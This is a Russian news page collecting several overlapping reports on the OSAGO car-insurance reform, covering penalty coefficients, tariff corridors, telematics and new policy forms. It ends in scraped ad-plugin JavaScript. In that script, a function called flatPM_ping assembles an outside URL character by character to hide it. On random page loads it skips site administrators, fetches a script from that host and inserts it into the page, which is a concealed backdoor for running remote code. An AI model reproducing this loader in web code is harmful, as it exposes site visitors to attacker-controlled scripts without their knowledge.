Последние новости о полисах осаго

Экономполитика

Накажут за грубость: ОСАГО вырастет в цене

Страховщики предупредили о возможном повышении стоимости ОСАГО

ОСАГО может подорожать на 30%. Так считают в Российском союзе страховщиков. Предложенные депутатами поправки в закон об ОСАГО должны поощрить аккуратных водителей низкой ценой полиса, а неаккуратных, напротив, наказать рублем за счет повышающих коэффициентов. Тарифный коридор будет расширен на 30% вверх и вниз.

Стоимость полиса ОСАГО может вырасти на 30%, сообщили «Известия» со ссылкой на Российский союз страховщиков (РСА).

В Госдуме рассматривается законопроект о «либерализации» ОСАГО, который предполагает введение повышающих коэффициентов за грубые нарушения правил дорожного движения (ПДД), таких как превышение скорости более чем на 60 км/ч, езда за рулем в состоянии опьянения, пересечение двойной сплошной, проезд на красный свет.

«Этот коэффициент, с одной стороны, позволит страховщикам более точно оценивать потенциальную аварийность автовладельцев, а с другой — простимулирует автовладельцев избегать грубых нарушений ПДД. Это должно привести к повышению безопасности дорожного движения», — рассказали изданию в пресс-службе РСА.

Сейчас также обсуждается вопрос отмены коэффициента мощности двигателя, сообщили в союзе.

«Коэффициент мощности двигателя по-прежнему предлагается исключить, при этом тарифный коридор будет расширен на 30% вверх и вниз», — отметили в РСА.

Депутатский вариант поправок внесен в Госдуму 20 ноября. Ранее аналогичные изменения предлагал Минфин. В планы министерства входило отменить коэффициенты мощности и региона использования автомобиля. Согласно документу, на стоимость полиса должны влиять нарушения ПДД, резкость торможения и перестроения, частота и длительность использования машины.

Однако законопроект не был поддержан, поскольку проект Минфина предусматривал расширение коридора базового тарифа на 82% в два этапа в 2020 году. По сути, это означало возможность для страховых компаний повысить стоимость полиса на 82%.

В рамках предложенного депутатами законопроекта

наибольшее увеличение базового тарифа грозит регионам-миллионникам. Это коснется Москвы, Перми, Челябинска и Казани, где базовая ставка вырастет в два раза, а в Подмосковье и Санкт-Петербурге — в 1,7 и 1,8 соответственно.

Это связано с повышенной аварийностью в этих регионах. Иными словами, установлен высокий территориальный тариф.

В Центробанке поддерживают идею индивидуальных тарифов. Иными словами, позволить платить меньше тем, кто не нарушает правила дорожного движения.

«С нашей точки зрения, наиболее значимым моментом реформы является индивидуализация тарифа, и его ключевым условием будет право страховой компании назначать тариф в пределах коридора, установленного Банком России. Мы понимаем, что отказ от коэффициента территорий — сложный вопрос. Сохранение территориального коэффициента сделает тариф менее индивидуальным и зависимым от места проживания. В то же время даже в таком виде это позволит системе стать более индивидуальной, чем при действующем регулировании», — сообщили в пресс-службе Центробанка.

Ситуация с рынком ОСАГО остается проблемной, и одна из задач проходящей реформы — повышение доступности полисов.

Так, ЦБ получает десятки тысяч обращений в год. Основные жалобы касаются невозможности купить полис и неправильного расчета коэффициента бонус-малус, который характеризует аккуратность водителя, учитывая число аварийных ситуаций, говорил ранее зампред ЦБ Владимир Чистюхин.

Глава комитета Госдумы по финансовому рынку Анатолий Аксаков отмечал, что тарифы, которые сегодня применяются к 39 млн владельцев полисов ОСАГО, являются не совсем справедливыми.

«Подавляющая часть нашего населения ездит добросовестно, не попадает в ДТП, но при этом платит примерно столько же, сколько платят те, кто постоянно в нарушениях и ДТП», — говорил он в Госдуме.

Напомним, стоимость автострахования для конкретного автомобиля зависит не только от размера базовой ставки, но и коэффициентов. Учитываются, например, возраст и водительский стаж водителя, регион, тип транспортного средства.

Последний раз ЦБ менял тарифы по автогражданке в два этапа осенью 2014 года (повышение на 30%) и весной 2015 года (рост на 40–60%).

Ранее страховщики заявили о снижении стоимости полиса ОСАГО. В среднем за 11 месяцев цена уменьшилась на 5%. Такое понижение зафиксировали в 76 регионах. Сильнее всего ОСАГО подешевело в Магаданской и Еврейской автономной областях, Республике Коми, Пермском крае, Белгородской, Вологодской, Саратовской и Архангельской областях.

Россиян предупредили о возможном подорожании ОСАГО почти на треть

Фото: Нина Зотина / РИА Новости

Стоимость полиса ОСАГО может вырасти почти на треть в случае отмены коэффициента за мощность двигателя автомобиля. Об этом сообщает газета «Известия» со ссылкой на Российский союз страховщиков (РСА).

Как сообщает издание, на данный момент в Госдуме рассматривается законопроект, который предусматривает введение повышающих коэффициентов для водителей. Согласно документу, их можно будет получить, например, за превышение скорости более чем на 60 километров в час, вождение в состоянии опьянения, пересечение двойной сплошной и проезд на красный свет.

В частности, депутаты обсуждают отмену коэффициента мощности двигателя, что расширит тарифный коридор на 30 процентов вверх и вниз. Сильнее всего это будет заметно в регионах, где проживает миллион жителей и более, отмечает издание. Так, в Подмосковье и Санкт-Петербурге базовая ставка ОСАГО умножится на 1,7 и 1,8 соответственно, а в Москве, Перми, Челябинске и Казани — в два раза.

Отмечается, что подобные изменения содержались в аналогичном законопроекте Минфина, который был отклонен в октябре.

С 1 октября 2019 года предельные выплаты по ОСАГО при аварии, оформленной без участия сотрудников ГИБДД, увеличились со 100 до 400 тысяч рублей. Получить максимальную выплату можно, если в аварию попали только два автомобиля, у обоих автовладельцев есть полис ОСАГО, в результате ДТП никто не пострадал и не было повреждено никакое другое имущество.

Россиян заставят раскошелиться за ошибки в полисе ОСАГО

Если полис ОСАГО виновника аварии заполнен неверно, страховщики имеют право взыскать с него всю сумму компенсации, выплаченной пострадавшему.

Об этом сообщают «Ведомости» в пятницу, ссылаясь на вступившую в силу 29 октября поправку к закону об ОСАГО.

Прежде мера распространялась только на электронные полисы ОСАГО. При этом поправка не учитывает, что ошибки могут быть допущены не автовладельцем, а брокером или сотрудником страховой компании, которые чаще всего заполняют заявления.

Нередко полис заполняют некорректно с целью снижения его стоимости: к примеру, заменяют русские буквы на латинские, которые система не распознает и автоматически присваивает заявке коэффициент бонус-малус.

Такой лазейкой пользуются как недобросовестные клиенты, так и посредники, торгующие поддельными полисами.

Таким образом, автовладельцы с ошибками в полисах могут «попасть» на крупные суммы: максимальное возмещение за вред имуществу по ОСАГО сейчас составляет 400 тыс. руб., а жизни и здоровью – 500 тыс. руб.

Эксперты опасаются, что страховщики начнут использовать поправку в свою пользу и намеренно неверно заполнять заявления на ОСАГО.

Ранее на этой неделе сообщалось, что стоимость «автогражданки» может подскочить в России на 30% из-за закона о либерализации. В Российском союзе автостраховщиков поспешили опровергнуть прогноз и напомнили, что средняя цена полиса по стране, наоборот, снижается.

Реформа ОСАГО 2020 – последние новости

  1. ДТП уже можно оформить почти полностью электронно через мобильное приложение. Но пока только в некоторых городах.
  2. Водителям стоит готовиться к индивидуализации автогражданки – тарифы на страховку станут больше зависеть от конкретного водителя, его данных и количества нарушений ПДД.
  3. Стоимость полиса ОСАГО после грядущих изменений может существенно возрасти.
  4. Не за горами объединение ОСАГО и КАСКО.

Говоря о реформе и об индивидуальных условиях в области ОСАГО для водителей, и страховщики, и Центральный Банк (регулятор рынка автогражданки) не имеют в виду предоставление каких-то особенных условий для каждого водителя в плане страхового возмещения или ремонта машин. Речь, конечно же, идет только о деньгах. А именно, о стоимости полисов после изменений в зависимости от того, кто из водителей заключает договор ОСАГО и кто будет допущен к управлению автомобилем.

Кто и сколько будет платить за полис в 2020 году?

Первый этап реформы уже прошел в 2019 году, в результате чего были скорректированы коэффициенты по возрасту и стажу, а также КБМ. Расширили и границы тарифного коридора на 20% в большую и меньшую стороны.

Но в 2020 году нас ждет уже следующее изменение границ тарифного коридора:

  • с 1 января – изменение тарифов на 40 процентов,
  • а в октябре 2020 года еще на 30 процентов.

При таких поправках стоимость договора для конкретного водителя может возрасти почти на 100%, ведь планируют еще отменить территориальные коэффициенты и коэффициент по мощности авто.

Если от процентов перейти к реальным деньгам, то к концу 2020 года верхняя граница базовой ставки после поправок может приблизиться к 9 тысячам рублей. И это только базовая ставка, без учета оставшихся коэффициентов. Таким образом, реформа ОСАГО в новом году может пойти далеко не на пользу обычным автовладельцам.

Скидки и надбавки

Коэффициенты, так или иначе меняющие конечную стоимость полиса ОСАГО, останутся. Предполагается, что в рамках реформы страхования появятся и новые, которые будут зависеть от манеры езды водителя, от количества нарушений ПДД.

Но поскольку это все еще проект, а все проекты у нас разрабатываются за закрытыми дверями, нельзя с уверенностью сказать, какие именно коэффициенты появятся, и как сильно они будут удорожать или удешевлять страховку.

Телематика в автомобилях

Много разговоров и обсуждений вызвали последние новости о том, что страховщики для нового расчета стоимости страховки ОСАГО будут применять так называемые телематические устройства. Вернее, не для самого расчета, а для определения скидки или коэффициента, применяемых при расчете.

Подобные телематические устройства уже используются страховщиками при страховании по КАСКО. Используют такие устройства не все страховщики, а, например такие, как:

  • ИНТАЧ-страхование,
  • Ренессанс страхование,
  • страховая компания УРАЛСИБ
  • ИНГОССТРАХ.

Такие «жучки», установленные в авто, будут показывать, какой стиль езды предпочитает водитель данного авто, быстро ли он ездит и резко ли он тормозит.

Однако, эти факторы могут никак не влиять на вероятность наступления страхового случая, ведь ДТП может произойти в случае, когда нарушит другой водитель, отсюда возникает вопрос, для чего всё это придумывают.

Объединение ОСАГО и КАСКО

В сентябре 2019 года регулятор предложил и разработал проект поправок, которыми предлагается как бы объединить два полиса в один. Но пока он ещё не вступил в силу.

В основном, условия для каждого из видов страхования останутся разными, но бланк будет один. В бланке полиса ОСАГО будет указываться информация о заключении соответствующего договора КАСКО. Взаимосвязаны будут сроки действия договоров.

Рассчитать стоимость страховки ОСАГО

Новые бланки с 1 февраля 2020 года

Напомним, что с 29 октября 2019 года вступили в силу изменения в Закон об ОСАГО касаемо бланков полисов.

До 1 февраля 2020 года можно будет получить полис ОСАГО на старом бланке, в котором есть и серия, и номер. После указанной даты каждому бланку будет присвоен уникальный номер, соответственно, изменится и внешний вид самого бланка.

Электронный полис и электронное извещение о ДТП

Нововведениями в Закон об ОСАГО и Правила страхования дорабатываются некоторые изменения по оформлению и использованию электронных полисов ОСАГО. Регламентируются правила запросов страховщиком данных об автомобиле и страхователе в других системах и ведомствах, а не только у страхователя, в виде сканированных копий. Копии теперь необходимо будет загружать только в случае, если страховщику не удалось получить эти данные другими способами.

Данная реформа будет проходить и дальше, планируется освободить водителей, участвовавших в ДТП, от заполнения извещений, если ДТП оформлялось сотрудниками полиции, ведь в таком случае сотрудники сами указывают все необходимые данные в выдаваемых документах.

Но пока обязанность оформлять извещения никуда не делась, а в некоторых городах водители уже могут оформлять ДТП и извещение в электронном виде.

Страховщики предупредили о возможном подорожании полисов ОСАГО на 30%

В России стоимость полиса ОСАГО может увеличиться на 30%. Об этом сообщают «Известия» со ссылкой на Российский союз страховщиков (РСА). Там объяснили, что это может произойти после внесения поправок в законопроект о «либерализации» ОСАГО. Так, на данный момент Госдума обсуждает вопрос отмены коэффициента мощности двигателя. Также предлагается сохранить повышающий коэффициент за грубые нарушения правил дорожного движения.

«Коэффициент мощности двигателя по-прежнему предлагается исключить, при этом тарифный коридор будет расширен на 30% вверх и вниз», — пояснили в организации.

В РС считают, что сильнее всего повышение цен ударит по жителям регионов-миллионников, где уже установили высокий территориальный тариф.

Из-за потенциально повышенной аварийности в Москве, Перми, Челябинске и Казани базовая ставка умножается на два, а в Подмосковье и Санкт-Петербурге — на 1,7 и 1,8 соответственно.

В октябре Госдума отложила рассмотрение законопроекта о реформе ОСАГО, который меняет систему расчета тарифов. Документ должен был запустить второй этап либерализации ОСАГО, дав страховщикам возможность применять собственные коэффициенты к разным водителям. Однако депутаты посчитали, что его принятие приведет к росту тарифов, и приняли решение снять проект с рассмотрения.

Кроме того, законопроект предполагал увеличение до 2 млн руб. суммы предельного размера возмещения за причинение вреда жизни или здоровью потерпевшего, но из-за возможного роста тарифов депутаты отвергли и эту идею.

После первого этапа либерализации, который прошел в январе 2019 г., по данным РСА, средняя премия в России по всем видам транспортных средств снизилась на 5,3%, а для легковых автомобилей физлиц — на 3,8%.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}